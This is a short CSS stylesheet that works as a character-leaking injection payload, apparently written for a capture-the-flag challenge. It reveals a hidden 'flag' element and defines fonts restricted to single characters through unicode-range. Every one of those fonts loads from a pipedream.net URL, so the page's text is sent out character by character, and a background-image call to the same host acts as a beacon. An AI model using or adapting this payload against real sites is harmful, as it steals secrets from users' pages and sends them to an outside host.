body{background-image:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=W23')}
#page{content-visibility:hidden;animation:unveil 0.001s 0.3s forwards}
@keyframes unveil{to{content-visibility:visible}}
#flag{display:block!important}
#flag{font-family:p97w23,p98w23,p106w23,p112w23,p115w23,p121w23,p122w23,p48w23,p49w23,p52w23,p53w23,p55w23,p125w23,monospace;width:23ch;white-space:pre-wrap;word-break:break-all;overflow:visible}
#flag::first-line{font-family:monospace!important}
@font-face{font-family:p97w23;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=a_W23');unicode-range:U+0061}
@font-face{font-family:p98w23;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=b_W23');unicode-range:U+0062}
@font-face{font-family:p106w23;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=j_W23');unicode-range:U+006A}
@font-face{font-family:p112w23;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=p_W23');unicode-range:U+0070}
@font-face{font-family:p115w23;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=s_W23');unicode-range:U+0073}
@font-face{font-family:p121w23;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=y_W23');unicode-range:U+0079}
@font-face{font-family:p122w23;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=z_W23');unicode-range:U+007A}
@font-face{font-family:p48w23;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=0_W23');unicode-range:U+0030}
@font-face{font-family:p49w23;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=1_W23');unicode-range:U+0031}
@font-face{font-family:p52w23;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=4_W23');unicode-range:U+0034}
@font-face{font-family:p53w23;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=5_W23');unicode-range:U+0035}
@font-face{font-family:p55w23;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=7_W23');unicode-range:U+0037}
@font-face{font-family:p125w23;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=%7D_W23');unicode-range:U+007D}